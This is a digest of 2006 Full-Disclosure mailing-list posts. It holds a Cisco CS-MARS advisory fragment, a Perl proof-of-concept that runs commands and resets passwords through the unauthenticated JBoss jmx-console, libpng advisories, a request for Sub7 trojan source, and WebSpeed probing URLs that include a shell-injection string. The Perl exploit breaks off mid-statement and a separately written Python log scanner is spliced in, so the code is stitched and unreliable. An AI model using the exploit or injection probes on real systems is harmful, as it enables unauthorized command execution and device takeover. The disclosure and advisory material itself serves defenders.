account and execute the version command.

prompt$ ssh [EMAIL PROTECTED]
[EMAIL PROTECTED]'s password:
Last login: Tue Jun 20 16:22:34 2006 from 10.0.0.2

  CS MARS - Mitigation and Response System

? for list of commands

[pnadmin]$ version
4.1.5 (2198)


Products Confirmed Not Vulnerable
+

No other Cisco products are currently known to be affected by these
vulnerabilities.

Details
===

Cisco Security Monitoring, Analysis and Response System (CS-MARS) is a
security system that receives event logs from various network devices,
correlates and analyzes the received data for security problems and
reports the findings. In addition, CS-MARS can perform automated tasks
to mitigate security problems.

  * CS-MARS utilizes an Oracle database to store sensitive network
event and configuration data. The information contained in the
database potentially includes authentication credentials for
network devices such as firewalls, routers and IPS devices and the
details of network security events. By default, Oracle databases
contain several built-in accounts with well-known passwords. If
access can be gained to the database, the accounts could
potentially be used to compromise the information stored in the
database. The CS-MARS appliance is hardened to prevent local and
remote unauthorized access to the database. As a precaution, the
database accounts have been disabled by Cisco to prevent abuse
should a method to access the database be discovered. The CS-MARS
application does not use the default Oracle database accounts. This
vulnerability is documented by Cisco bug ID CSCsd16256.

  * CS-MARS contains an installation of the JBoss web application
server. It may be possible for a remote, unauthenticated user to
create a specially-crafted HTTP request which executes arbitrary
shell commands on the CS-MARS appliance with the privileges of the
CS-MARS administrator via the optional JBoss JMX console. This
vulnerability is documented by Cisco bug ID CSCse47646. 

  * The CS-MARS CLI is a restricted shell environment which allows
authenticated administrators to perform system maintenance tasks.
The CLI contains several privilege escalation vulnerabilities which
may allow shell commands to be executed on the underlying appliance
operating system with root privileges. These vulnerabilities are
documented by Cisco bug IDs CSCsd29111, CSCsd31371, CSCsd31377,
CSCsd31392 and CSCsd31972.

Impact
==

  * Exploitation of the default Oracle accounts vulnerability (CSCsd16256) 
may result in the compromise

[Full-disclosure] Cisco MARS 4.2.1 remote compromise

2006-07-19 Thread Jon Hart
Cisco MARS (Monitoring, Analysis and Response System, sometimes referred
to as CS-MARS) prior to version 4.2.1 ships with an unprotected JBoss
installation which ultimately leads to a complete compromise of the
device.

The caveat here is that, despite much work on Cisco's part, they were
not able to determine why some CS-MARS boxes were vulnerable and others
were not.  In versions 4.2.1 and newer, the discovered vulnerabilities
have been fixed.

Vulnerability #1


CS-MARS shipped with JBoss 3.2.7, which suffered a number of flaws
originally disclosed by Marc Schoenefeld in June of 2005.  See
http://www.securityfocus.com/archive/1/402653 for the original posting.

Vulnerability #2


CS-MARS' JBoss installation is basically stock, so few if any of the
recommended procedures were taken to secure it prior to shipment.
A common document used in securing JBoss can be found at
http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureJBoss

Perhaps the most glaring vulnerability that results is the exposure of
the jmx-console, and in turn full access to all of the MBeans.  Per
JBoss.org's description of the jmx-console:

   The JMX console provides a raw view into the microkernel of the
   JBoss application server. It lists all registered services (MBeans)
   that are active in the application server and that can be accessed
   either through the JMX console itself or programmatically from Java
   code.

As you can imagine, once an attacker has access to the jmx-console, the
thoroughness with which the box can be compromised is only limited by
their imagination.  The jmx console is reachable on CS-MARS devices
versions < 4.2.1 -- no authentication is necessary, and is available on
port 80 and 443.

I've put together some functional POC exploit code that leverages many
of the MBeans to compromise the system in various ways.  Please see the
attached code.


Vendor status
-

Cisco's PSIRT was extremely responsive throughout this entire process.
The JBoss issues I mentioned above are addressed by Cisco DDTS
CSCse47646, and fixed in version 4.2.1 and newer.


Enjoy,

-jon

#!/usr/bin/perl
# 
# Cisco/Protego CS-MARS < 4.2.1 remote command execution, system compromise
# via insecure JBoss installation.
#
# Fully functional POC code by Jon Hart [EMAIL PROTECTED]
#
# Addressed in CSCse47646
#
# CS-MARS is an event correlation product originally written by Protego,
# which is now owned by Cisco.  It is built on top of JBoss.
# Unfortunately, little or no effort was put in to securing the JBoss
# installation as per the JBoss community's recommended best practices.
# As such, the usual set of JBoss interfaces are wide open and it is up to
# the attacker how creative they want to be in compromising the box.  This
# particular exploit vector abuses the JBoss jmx-console for all sorts of
# fun.  It should also be noted that, because of the very old kernel
# running on most CS-MARS boxes (2.4.9), once JBoss is compromised, root is
# almost trivial.  Thanks to Cisco PSIRT and Matt Cerha for their
# cooperation in getting this fixed.
#
#
#  Copyright (C) 2006 Jon Hart
#
#  This program is free software; you can redistribute it and/or modify it
#  under the terms of the GNU General Public License as published by the Free
#  Software Foundation; either version 2 of the License, or (at your option)
#  any later version.
#
#  This program is distributed in the hope that it will be useful, but WITHOUT
#  ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
#  FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
#  more details.
#
#  You should have received a copy of the GNU General Public License along with
#  this program; if not, write to the Free Software Foundation, Inc., 59 Temple
#  Place, Suite 330, Boston, MA 02111-1307 USA
#
#
#
#

use strict;
use HTTP::Request::Common;
use LWP::UserAgent;
use IO::Socket;

my $target = shift(@ARGV) || usage();
my $attack_type = shift(@ARGV) || usage();

for ($attack_type) {
   if (/pass/) { change_passwd(@ARGV); }
   elsif (/cmd/) { run_cmd(@ARGV); }
   elsif (/upload/) { upload(@ARGV); }
   elsif (/bean|bsh/) { run_bsh(@ARGV); }
   else { usage(); }
}

sub change_passwd {
   my $passwd = shift;
   run_cmd("/opt/janus/release/bin/pnpasswd $passwd");
}

# Percent-encode the characters that would otherwise break the
# form-urlencoded body posted to the HtmlAdaptor.
sub encode {
   my $en = shift;
   my $string = "";
   foreach my $char (split(//, $en)) {
      if ($char =~ /([:|\/|(|)|"|'|`| ])/) {
         $string .= sprintf("%%%x", ord($1));
      } else { $string .= $char; }
   }
   return $string;
}

# Submit one form to the jmx-console HtmlAdaptor and report success.
sub jmx_post {
   my $form_data = shift;
   my $ua = LWP::UserAgent->new;
   $ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
   my $req = HTTP::Request->new(POST => "http://$target/jmx-console/HtmlAdaptor");
   $req->content_type('application/x-www-form-urlencoded');
   $req->content(encode($form_data));

   my $res = $ua->request($req);

   return $res->is_success ? 0 :

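A defender-side companion to the advisory above, added here and not part of Jon Hart's post: it scans access-log lines (constructed samples) for requests to the jmx-console HtmlAdaptor that the advisory describes and rates each by whether the console answered without an authentication challenge. The Apache "combined" log format, the severity labels and the sample addresses are assumptions.

```python
import re
from collections import namedtuple

# Apache/httpd "combined" access-log format (assumption; adapt for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# The endpoint named in the advisory; every request of interest lives under it.
JMX_PATH_RE = re.compile(r'^/jmx-console(/|$)', re.IGNORECASE)

Finding = namedtuple("Finding", "ip ts method path status severity")


def classify(method, path, status):
    """Severity of one request, or None when it is not jmx-console traffic."""
    if not JMX_PATH_RE.match(path):
        return None
    if status in (401, 403):
        return "info"      # the console challenged or refused: authentication is enforced
    if status >= 400:
        return "low"       # a probe that failed for some other reason (404, 5xx)
    if method == "POST":
        return "critical"  # HtmlAdaptor accepted a form post: an MBean operation ran
    return "high"          # console page served with no credentials asked for


def scan(lines):
    """Return a Finding for every jmx-console request in the given log lines."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        status = int(m.group("status"))
        sev = classify(m.group("method"), m.group("path"), status)
        if sev is not None:
            findings.append(Finding(m.group("ip"), m.group("ts"), m.group("method"),
                                    m.group("path"), status, sev))
    return findings


# Constructed sample lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.9 - - [19/Jul/2006:10:01:02 +0000] "GET /jmx-console/ HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [19/Jul/2006:10:01:09 +0000] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 812 "-" "Mozilla/4.0"',
    '198.51.100.4 - - [19/Jul/2006:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "curl/7.15"',
    '198.51.100.4 - - [19/Jul/2006:10:02:05 +0000] "GET /jmx-console/ HTTP/1.1" 401 0 "-" "curl/7.15"',
]
if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.severity:8} {f.ip:14} {f.method} {f.path} -> {f.status}")
```

On a patched appliance the only expected entries are "info" (challenged) ones; a "high" or "critical" finding means the console is still serving unauthenticated requests.
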
[Full-disclosure] [ GLSA 200607-06 ] libpng: Buffer overflow

2006-07-19 Thread Thierry Carrez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200607-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: libpng: Buffer overflow
  Date: July 19, 2006
  Bugs: #138433, #138672
ID: 200607-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A buffer overflow has been found in the libpng library that could lead
to the execution of arbitrary code.

Background
==========

libpng is an open, extensible image format library, with lossless
compression.

Affected packages
=================

    -------------------------------------------------------------------
     Package                      /  Vulnerable  /         Unaffected
    -------------------------------------------------------------------
  1  libpng                           < 1.2.12                >= 1.2.12
  2  emul-linux-x86-baselibs          < 2.5.1                  >= 2.5.1
    -------------------------------------------------------------------
     # Package 2 [app-emulation/emul-linux-x86-baselibs] only applies
       to AMD64 users.

     NOTE: Any packages listed without architecture tags apply to all
           architectures...
    -------------------------------------------------------------------
     2 affected packages
    -------------------------------------------------------------------

Description
===========

In pngrutil.c, the function png_decompress_chunk() allocates
insufficient space for an error message, potentially overwriting stack
data, leading to a buffer overflow.

Impact
======

By enticing a user to load a maliciously crafted PNG image, an attacker
could execute arbitrary code with the rights of the user, or crash the
application using the libpng library, such as the
emul-linux-x86-baselibs.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All libpng users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-libs/libpng-1.2.12"

All AMD64 emul-linux-x86-baselibs users should also upgrade to the
latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-emulation/emul-linux-x86-baselibs-2.5.1"

References
==========

  [ 1 ] libpng Changelog
        http://heanet.dl.sourceforge.net/sourceforge/libpng/libpng-1.2.12-README.txt
  [ 2 ] CVE-2006-3334
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3334

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200607-06.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Bindiffing Patches

2006-07-19 Thread Ivan Stroks
Does someone know about a non-commercial tool to
perform binary diffing over patches? 

Something like SABRE BinDiff, but free?

Regards,

IvaN!




Re: [Full-disclosure] Bindiffing Patches

2006-07-19 Thread Alexandru Maximciuc
Hello Ivan,

Wednesday, July 19, 2006, 9:45:28 PM, you wrote:

> Does someone know about a non-commercial tool to
> perform binary diffing over patches?
>
> Something like SABRE BinDiff, but free?
>
> Regards,
>
> IvaN!




hope I'm not off-topic :D
did you have a look at iDefense's IDACompare?

-- 
Best regards,
 Alexandru                          mailto:[EMAIL PROTECTED]






[Full-disclosure] rPSA-2006-0133-1 libpng

2006-07-19 Thread Justin M. Forbes
rPath Security Advisory: 2006-0133-1
Published: 2006-07-19
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
User Non-deterministic Unauthorized Access
Updated Versions:
libpng=/[EMAIL PROTECTED]:devel//1/1.2.12-2-0.1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3334
https://issues.rpath.com/browse/RPL-517

Description:
Previous versions of the libpng package contain a weakness in
processing images that is known to create a denial of service
vulnerability and is expected also to allow unauthorized access.
This weakness is triggered by malformed png images that may be
provided to applications such as web browsers by an attacker.



[Full-disclosure] Sub7 Source code

2006-07-19 Thread Equinox
Hi,

I've been looking for sub7's source code to have a play with, but I haven't
been able to find it. Any version will do, but the 1.5 or 2.2 source would be
preferable. A link to its source, or even an attachment of it would be greatly
appreciated.

Thank you,

RE: [Full-disclosure] anoNet: Cooperative Chaos

2006-07-19 Thread guant a
Hrm, that's strange that the website is down. I don't run it. Here is another 
address. This works as of today, July 19, 2006.

http://anonetnfo.brinkster.net

guant




[Full-disclosure] Webspeed remote testing tips?

2006-07-19 Thread Mark Sec
Alo, does anyone have more info about webspeed vulnerabilities? Or how to
execute remote commands? Does anyone have a glossary about error msgs or
services?

I tried:

(1) http://server/cgi-bin/anyfile.sh/WService=anything?WSMadmin
    Messenger: Internal command access denied. (6368)

(2) http://server/cgi-bin/anyfile.sh/|id;uname;ls;
    Messenger: URL contains invalid syntax. (6369)

(3) http://server/cgi-bin/wspd_cgi.sh?
    Msngr: the specified service name does not exist or has a bad format. (5825): wsbroker1
    wsbroker1? what services can we execute?

(4) http://server/scripts/wsisa.dll/WService=anything?WSMadmin - for win32 (not successful)

(5) http://server/scripts/wsnsa.dll/WService=anything?WSMadmin - for Unix (not successful)

regards
- Mark :-)